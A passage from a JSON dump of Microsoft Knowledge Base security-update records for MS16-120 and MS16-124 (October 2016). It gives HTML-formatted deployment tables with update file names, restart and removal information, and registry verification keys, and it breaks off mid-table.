class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-104\" target=\"_self\">Microsoft Knowledge Base article 3192440</a><br/>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-105\" target=\"_self\">Microsoft Knowledge Base article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-106\" target=\"_self\">Microsoft Knowledge Base article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Microsoft Word Viewer (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft Word Viewer:<br/><span class=\"text-base\">office2003-kb3118394-fullfile-enu.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/912203\" id=\"kb-link-107\" target=\"_self\">Microsoft Knowledge Base article 912203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a restart. If the required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. <br/><br/>To help reduce the chance that a restart will be required, stop all affected services and close all applications that may use the affected files prior to installing the security update. For more information about the reasons why you may be prompted to restart, see <a href=\"https://support.microsoft.com/help/887012\" id=\"kb-link-108\" target=\"_self\">Microsoft Knowledge Base article 887012</a>. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Use <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3118394\" id=\"kb-link-109\" target=\"_self\">Microsoft Knowledge Base article 3118394</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">Not applicable</td></tr></table></div><h4 class=\"sbody-h4\"> Microsoft Office 2007 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Microsoft Office 2007:<br/><span class=\"text-base\">ogl2007-KB3118301-fullfile-x86-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/912203\" id=\"kb-link-110\" target=\"_self\">Microsoft Knowledge Base article 912203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a restart. If the required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. <br/><br/>To help reduce the chance that a restart will be required, stop all affected services and close all applications that may use the affected files prior to installing the security update. For more information about the reasons why you may be prompted to restart, see <a href=\"https://support.microsoft.com/help/887012\" id=\"kb-link-111\" target=\"_self\">Microsoft Knowledge Base article 887012</a>. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Use <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3118301\" id=\"kb-link-112\" target=\"_self\">Microsoft Knowledge Base article 3118301</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">Not applicable</td></tr></table></div><h4 class=\"sbody-h4\"> Microsoft Office 2010 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Microsoft Office 2010 (32-bit editions):<br/><span class=\"text-base\">ogl2010-KB3118317-fullfile-x86-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Microsoft Office 2010 (64-bit editions):<br/><span class=\"text-base\">ogl2010-KB3118317-fullfile-x64-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/912203\" id=\"kb-link-113\" target=\"_self\">Microsoft Knowledge Base article 912203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a restart. If the required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. <br/><br/>To help reduce the chance that a restart will be required, stop all affected services and close all applications that may use the affected files prior to installing the security update. For more information about the reasons why you may be prompted to restart, see <a href=\"https://support.microsoft.com/help/887012\" id=\"kb-link-114\" target=\"_self\">Microsoft Knowledge Base article 887012</a>. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Use <span class=\"text-base\">Add or Remove Programs</span> item in Control Panel. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3118317\" id=\"kb-link-115\" target=\"_self\">Microsoft Knowledge Base article 3118317</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">Not applicable</td></tr></table></div><h4 class=\"sbody-h4\"> Microsoft Live Meeting 2007, Microsoft Lync 2010, Microsoft Lync 2010 Attendee, Microsoft Lync 2013 (Skype for Business), and Microsoft Lync Basic 2013 (Skype for Business Basic)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft Live Meeting 2007 Console (3189647):<br/><span class=\"text-base\">LMSetup.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 (32-bit) (3188397):<br/><span class=\"text-base\">lync.msp</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 (64-bit) (3188397):<br/><span class=\"text-base\">lync.msp</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 Attendee (user level install) (3188399):<br/><span class=\"text-base\">AttendeeUser.msp</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 Attendee (admin level install) (3188400):<br/><span class=\"text-base\">AttendeeAdmin.msp</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Microsoft Lync 2013 (Skype for Business) (32-bit) and Microsoft Lync Basic 2013 (Skype for Business Basic) (32-bit):<br/><span class=\"text-base\">lync2013-KB3118348-fullfile-x86-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Microsoft Lync 2013 (Skype for Business) (64-bit) and Microsoft Lync Basic 2013 (Skype for Business Basic) (64-bit):<br/><span class=\"text-base\">lync2013-KB3118348</span><span class=\"text-base\">-fullfile-x64-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Skype for Business 2016 and Skype for Business Basic 2016:<br/><span class=\"text-base\">lync2016-KB3118327-fullfile-x86-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 64-bit editions of Skype for Business 2016\u00a0and Skype for Business Basic 2016:<br/><span class=\"text-base\">lync2016-KB3118327-fullfile-x64-glb.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/912203\" id=\"kb-link-116\" target=\"_self\">Microsoft Knowledge Base article 912203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">In some cases, this update does not require a restart. If the required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. <br/><br/>To help reduce the chance that a restart will be required, stop all affected services and close all applications that may use the affected files prior to installing the security update. For more information about the reasons why you may be prompted to restart, see <a href=\"https://support.microsoft.com/help/887012\" id=\"kb-link-117\" target=\"_self\">Microsoft Knowledge Base article 887012</a>. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Use <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">For Microsoft Live Meeting 2007 Console:<br/>See <a href=\"https://support.microsoft.com/help/xxxxxx\" id=\"kb-link-118\" target=\"_self\">Microsoft Knowledge Base article xxxxxx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Microsoft Lync 2010:<br/>See <a href=\"https://support.microsoft.com/help/xxxxxx\" id=\"kb-link-119\" target=\"_self\">Microsoft Knowledge Base article xxxxxx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 Attendee (user level install):<br/>See <a href=\"https://support.microsoft.com/help/xxxxxx\" id=\"kb-link-120\" target=\"_self\">Microsoft Knowledge Base article xxxxxx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 Attendee (admin level install):<br/>See <a href=\"https://support.microsoft.com/help/xxxxxx\" id=\"kb-link-121\" target=\"_self\">Microsoft Knowledge Base article xxxxxx</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2013 (Skype for Business) and Microsoft Lync Basic 2013 (Skype for Business Basic):<br/>See <a href=\"https://support.microsoft.com/help/3118348\" id=\"kb-link-122\" target=\"_self\">Microsoft Knowledge Base article 3118348</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Skype for Business 2016 and Skype for Business Basic 2016:<br/>See <a href=\"https://support.microsoft.com/help/3118327\" id=\"kb-link-123\" target=\"_self\">Microsoft Knowledge Base article 3118327</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry Key Verification</span></td><td class=\"sbody-td\">For Microsoft Live Meeting 2007 Console:<br/>Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 (32-bit):<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{0EEB34F6-991D-4a1b-8EEB-772DA0EADB22}<br/>Version = <span class=\"text-base\">7577.4498</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 (64-bit):<br/>HKEY_LOCAL_MACHINE\\ SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components\\{0EEB34F6-991D-4a1b-8EEB-772DA0EADB22}<br/>Version = <span class=\"text-base\">7577.4498</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 Attendee (user level install):<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{0EEB34F6-991D-4a1b-8EEB-772DA0EADB22}<br/>Version = <span class=\"text-base\">7577.4498</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2010 Attendee (admin level install):<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\94E53390F8C13794999249B19E6CFE33\\InstallProperties\\DisplayVersion = <span class=\"text-base\">4.0.7577.4498</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Lync 2013 (Skype for Business) and Microsoft Lync Basic 2013 (Skype for Business Basic):<br/>Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Skype for Business 2016 and Skype for Business Basic 2016:<br/>Not applicable</td></tr></table></div><h4 class=\"sbody-h4\"> Silverlight 5 for Mac (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft Silverlight 5 when installed on Mac:<br/><span class=\"text-base\">Silverlight.dmg</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Silverlight 5 Developer Runtime when installed on Mac:<br/><span class=\"text-base\">silverlight_developer.dmg</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Open the Finder, select the system drive, go to the folder <span class=\"text-base\">Internet Plug-ins - Library</span>, and delete the file <span class=\"text-base\">Silverlight.Plugin</span>. (Note that the update cannot be removed without removing the Silverlight plug-in.)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2932677\" id=\"kb-link-124\" target=\"_self\">Microsoft Knowledge Base article 2932677</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation verification</span></td><td class=\"sbody-td\">See the <span class=\"text-base\">Update FAQ</span> section in this bulletin that addresses the question, \"How do I know which version and build of Microsoft Silverlight is currently installed?\"</td></tr></table></div><h4 class=\"sbody-h4\"> Silverlight 5 for Windows (all supported releases)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft Silverlight 5 when installed on all supported 32-bit releases of Microsoft Windows:<br/><span class=\"text-base\">silverlight.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Silverlight 5 Developer Runtime when installed on all supported 32-bit releases of Microsoft Windows:<br/><span class=\"text-base\">silverlight_developer.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Silverlight 5 when installed on all supported 64-bit releases of Microsoft Windows:<br/><span class=\"text-base\">silverlight_x64.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft Silverlight 5 Developer Runtime when installed on all supported 64-bit releases of Microsoft Windows:<br/><span class=\"text-base\">silverlight_developer_x64.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See the <a href=\"http://download.microsoft.com/download/c/d/5/cd5aaae3-21f7-47a8-b7d5-39e36baf9ac8/silverlight_deployment_guide.docx\" id=\"kb-link-125\" target=\"_self\">Silverlight Enterprise Deployment Guide</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Use <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel. (Note that the update cannot be removed without removing Silverlight.)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3193713\" id=\"kb-link-126\" target=\"_self\">Microsoft Knowledge Base article 3193713</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For 32-bit installations of Microsoft Silverlight 5:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Silverlight \"Version\" = \"5.1.50901.0\"</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For 64-bit installations of Microsoft Silverlight 5: <br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Silverlight \"Version\" = \"5.1.50901.0\"<br/>and<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Silverlight \"Version\" = \"5.1.50901.0\"</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-127\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-128\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-129\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/\" id=\"kb-link-130\" target=\"_self\">International Support</a></div><br/></span></div></div></div></div></body></html>", "edition": 3, "modified": "2016-10-14T23:36:12", "id": "KB3192884", "href": "https://support.microsoft.com/en-us/help/3192884/", "published": "2016-10-11T00:00:00", "title": "MS16-120: Security update for Microsoft graphics component: October 11, 2016", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:28", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-0075", "CVE-2016-0079", "CVE-2016-0070", "CVE-2016-0073"], "description": "<html><body><p>Resolves vulnerabilities in Windows that could allow elevation of privilege if an attacker can access sensitive registry information.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker can access sensitive registry information.<br/><br/><br/><br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-124\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-124</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3191256\" id=\"kb-link-6\" target=\"_self\">3191256</a> MS16-124: Description of the security update for Windows registry: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-7\" target=\"_self\">3192392</a> October 2016 security only quality update for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-8\" target=\"_self\">3185331</a> October 2016 security monthly quality rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-9\" target=\"_self\">3192393</a> October 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-10\" target=\"_self\">3185332</a> October 2016 security monthly quality rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-11\" target=\"_self\">3192391</a> October 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-12\" target=\"_self\">3185330</a> October 2016 security monthly quality rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-13\" target=\"_self\">3192440</a> Cumulative update for Windows 10: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-14\" target=\"_self\">3194798</a> Cumulative update for Windows 10 Version 1607 and Windows Server 2016: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-15\" target=\"_self\">3192441</a> Cumulative update for Windows 10 Version 1511: October 11, 2016</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><a class=\"bookmark\" id=\"obtaintheupdate\"></a><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see<br/><a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-17\" target=\"_self\">Get security updates automatically</a>.<br/><br/><span class=\"text-base\">Note</span> For Windows RT 8.1, this update is available through Windows Update only.<br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=3193227\" id=\"kb-link-18\" target=\"_self\">Microsoft Update Catalog</a> website.<br/></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Method 3: Microsoft Download Center</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">You can obtain the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.<br/><br/>Click the download link in <a href=\"https://technet.microsoft.com/library/security/ms16-124\" id=\"kb-link-19\" target=\"_self\">Microsoft Security Bulletin MS16-124</a> that corresponds to the version of Windows that you are running.<br/></div><br/></span></div></div></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information<br/></span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3191256-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3191256-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3191256\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3191256</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191256-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191256-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191256-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3191256\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3191256</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation. </td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions) </h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3192391-x86.msu<br/></span>Security Only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">Windows6.1-KB3185330-x86.msu<br/></span>Monthly Rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of 